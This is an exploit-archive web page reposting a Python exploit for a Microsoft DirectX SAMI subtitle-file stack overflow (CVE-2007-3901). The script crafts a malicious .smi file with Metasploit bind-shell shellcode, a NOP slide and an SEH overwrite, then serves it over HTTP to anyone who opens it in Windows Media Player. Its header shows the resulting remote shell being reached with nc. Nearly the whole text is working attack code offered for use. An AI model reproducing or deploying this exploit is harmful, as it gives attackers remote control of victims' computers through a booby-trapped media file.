首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit 来源：http://www.gray-world.net 作者：Matteo 发布时间：2008-01-09   #!/usr/bin/python ########################################################################## # Bug discovered by Jun Mao of VeriSign iDefense # http://www.securityfocus.com/bid/26789 # CVE-2007-3901 # Coded by Matteo Memelli aka ryujin # http://www.gray-world.net http://www.be4mind.com # Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700) #------------------------------------------------------------------------ # THX TO all the guys at www.offensive-security.com # EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!! # I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha #------------------------------------------------------------------------ ##########################################################################  # On Windows Media Player Open---> http://attacker/anyfile.smi # .smi extension is necessary, filename can be anything. #  # badrobot:/home/matte# ./mplayer.py # [+] Listening on port 80 # [+] Connection accepted from: 192.168.1.243 # [+] Payload sent, check your shell on 192.168.1.243 port 4444 # badrobot:/home/matte# nc 192.168.1.243 4444 # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # C:\Documents and Settings\ryujin\Desktop>ipconfig # ipconfig # # Windows 2000 IP Configuration # # Ethernet adapter Local Area Connection: # #        Connection-specific DNS Suffix  . : #        IP Address. . . . . . . . . . . . : 192.168.1.243 #        Subnet Mask . . . . . . . . . . . : 255.255.255.0 #        Default Gateway . . . . . . . . . : # # C:\Documents and Settings\ryujin\Desktop> ########################################################################## from socket import * # SMI BODY body = """<SAMI> <HEAD> <STYLE TYPE="text/css"> <!-- P { font-size: 1em; font-family: Arial; font-weight: normal; color: #FFFFFF; background: #000000; text-align: center; padding-left: 5px; padding-right: 5px; padding-bottom: 2px; } .ENUSCC { Name: English; lang: EN-US-CC; } --> </STYLE> </HEAD> <BODY> <SYNC Start="0" pippo=\"""" # Metasploit bind shell on port 4444 EXITFUNC seh shellcode = ( "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0" ) body += 21988*'A'                                 body += '\x90'*16                                 # NOP Slide body += shellcode + 'C'*67                        # to SEH... body += '\xeb\x06\x90\x90\x2b\x1e\xe1\x77'        # ShortJmp, and SEH overwrite body += '\x90'*4 + '\xE9\x6B\xFE\xFF\xFF\x90\x90' # NearJmp, back to shellcode body += 143505*'E' + '">' body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>' # RESPONSE HEADER header = ( 'HTTP/1.1 200 OK\r\n' 'Content-Type: application/smil\r\n' '\r\n' ) evilbuf = header + body s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 80)) s.listen(1) print "[+] Listening on port 80" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.recv(1024) c.send(evilbuf) print "[+] Payload sent, check your shell on %s port 4444" % addr[0] c.close() s.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ClamAV 0.91.2 libclamav MEW PE ·PHP Webquest 2.6 (id_actividad ·Eggblog <= 3.1.0 Cookies Remot ·Move Networks Quantum Streamin ·FlexBB <= 0.6.3 Cookies Remote ·Gateway Weblaunch ActiveX Cont ·Half-Life CSTRIKE Server 1.6 D ·UploadImage/UploadScript 1.0 R ·DCP-Portal <= 6.11 Remote SQL ·Microsoft FoxServer (vfp6r.dll ·Site@School <= 2.3.10 Remote B ·Microsoft Rich Textbox Control   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved